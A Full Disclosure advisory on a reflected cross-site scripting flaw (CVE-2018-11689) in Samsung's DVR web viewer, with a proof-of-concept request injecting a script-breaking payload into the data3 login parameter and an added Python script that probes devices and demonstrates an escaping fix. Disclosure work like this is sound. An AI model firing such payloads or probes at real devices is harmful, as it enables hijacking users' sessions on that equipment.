Message-ID: <CALQO-TTWBxkdAuMZXD9ndkjFd6nLDp2w1fYjvANcg3OWE-YfEA@mail.gmail.com>
Date: Wed, 13 Jun 2018 12:42:35 +0300
From: yavuz atlas <yavatlas@...il.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org,
bugs@...uritytracker.com
Subject: [FD] Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS) CVE-2018-11689
I. VULNERABILITY
-------------------------
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)
II. CVE REFERENCE
-------------------------
CVE-2018-11689
III. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689
IV. CREDIT
-------------------------
Yavuz Atlas - Biznet Bilisim
http://www.biznet.com.tr/biznet-guvenlik-duyurulari
V. DESCRIPTION
-------------------------
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is
vulnerable to reflected cross-site scripting. The data3 parameter of
/cgi-bin/webviewer_login_page is copied into the login page without
encoding, and without surrounding quotes, inside an inline script block.
A value containing </script> therefore closes that block, and any script
that follows it runs in the origin of the DVR's web interface. A remote
attacker who gets a user to open a crafted link can inject arbitrary web
script or HTML.
VI. PROOF OF CONCEPT
-------------------------
Request:
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> HTTP/1.1
Host: 10.10.10.10
Response:
HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true
Content-type: text/html
Connection: close
Date: Wed, 23 May 2018 11:14:09 GMT
Server: lighttpd/1.4.35
Content-Length: 10797
…
function setcookie(){
    var val_rand = Math.random();
    if(is_close_user_session == true)
        document.login_page_submit.close_user_session.value = 1;
    else
        document.login_page_submit.close_user_session.value = 0;
    document.login_page_submit.data1.value = data_parser(document.login_page.data1.value);
    document.login_page_submit.data2.value = do_encrypt(document.login_page.data2.value);
    document.login_page_submit.data3.value = </script><script>alert(1)</script>;
    document.login_page_submit.data4.value = val_rand;
    document.login_page_submit.submit();
}
…
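The following script is an added example, not code from the advisory, from Biznet or from Samsung. It reproduces the request above, classifies how the data3 value comes back (verbatim, HTML-entity-encoded, or as an escaped JavaScript string literal), and shows why the verbatim reflection is exploitable: an HTML parser ends a script element at the first </script> it sees, regardless of JavaScript syntax, so the injected second script block becomes a separate, executable element. The sample response is constructed to mirror the advisory's snippet; js_string_literal() is this example's suggested server-side fix (encode the value as a JS string literal with <, >, &, quotes and line terminators as \uXXXX), not the vendor's patch; probe() is the only function that touches the network.

```python
"""Reflected-XSS probe and fix demonstration for the Samsung Web Viewer
login page (CVE-2018-11689).  Added example; not code from the advisory
or from Samsung.  Taken from the advisory: the path, the query parameters
and the shape of the reflection.  Everything else (function names, the
constructed sample response, js_string_literal as the fix) is assumed."""
import html
import re
import urllib.parse
import urllib.request

LOGIN_PATH = "/cgi-bin/webviewer_login_page"
PAYLOAD = "</script><script>alert(1)</script>"   # the advisory's PoC value
# An HTML parser closes a script element at the first '</script>' it meets,
# whatever the JavaScript inside looks like; this regex mimics that rule.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def build_poc_url(host, marker=PAYLOAD, scheme="http"):
    """URL-encode the PoC so it survives clients and proxies that reject a raw '<'."""
    params = {"lang": "tu", "loginvalue": "0", "port": "0", "data3": marker}
    return f"{scheme}://{host}{LOGIN_PATH}?{urllib.parse.urlencode(params)}"


def script_blocks(body):
    """Return the bodies of the <script> elements as a browser would delimit them."""
    return SCRIPT_RE.findall(body)


def js_string_literal(value):
    """Encode untrusted text as a JS string literal that can terminate neither
    the literal nor the enclosing <script> element.  Suggested fix (assumed)."""
    escaped = "".join(
        "\\u%04x" % ord(ch) if ch in "\\\"'<>&\n\r\u2028\u2029" else ch
        for ch in value)
    return '"' + escaped + '"'


def reflection_verdict(body, marker):
    """Classify how the probe value came back in the response body."""
    if marker in body:
        return "unescaped"          # vulnerable: '</script>' breaks out of the block
    if html.escape(marker, quote=True) in body:
        return "html-escaped"       # entity-encoded; harmless in this context
    if js_string_literal(marker) in body:
        return "js-escaped"         # emitted as a safe JS string literal
    return "not-reflected"


def render_vulnerable(data3):
    """Constructed sample mirroring the advisory's response: data3 is emitted
    verbatim and unquoted inside inline JavaScript."""
    return ("<html><body><script>\n"
            "function setcookie(){\n"
            "  document.login_page_submit.data3.value = " + data3 + ";\n"
            "  document.login_page_submit.submit();\n"
            "}\n</script></body></html>")


def render_fixed(data3):
    """The same page with data3 emitted as an escaped JS string literal."""
    return ("<html><body><script>\n"
            "function setcookie(){\n"
            "  document.login_page_submit.data3.value = "
            + js_string_literal(data3) + ";\n"
            "  document.login_page_submit.submit();\n"
            "}\n</script></body></html>")


def probe(host, timeout=5):
    """Fetch the login page from a real device and classify the reflection.
    Network call: run it only against equipment you are authorised to test."""
    with urllib.request.urlopen(build_poc_url(host), timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return reflection_verdict(body, PAYLOAD), script_blocks(body)


if __name__ == "__main__":
    vuln, fixed = render_vulnerable(PAYLOAD), render_fixed(PAYLOAD)
    # The vulnerable page yields two script elements, the second being "alert(1)";
    # the fixed page yields one, with the payload inert inside a string literal.
    print("vulnerable:", reflection_verdict(vuln, PAYLOAD), script_blocks(vuln))
    print("fixed:     ", reflection_verdict(fixed, PAYLOAD), script_blocks(fixed))
```

Two points the check makes visible. First, because the reflected value is unquoted JavaScript rather than a string, any encoding that only neutralises HTML (entity-encoding `<`) is sufficient here only by accident; the durable fix is to emit the value as a properly escaped JS string literal and to validate it server-side as well. Second, a browser's script-element tokeniser does not know JavaScript, so `</script>` inside what the server believed was a single script block is enough to start a second one; that is why the `alert(1)` block above ends up as its own element.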
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/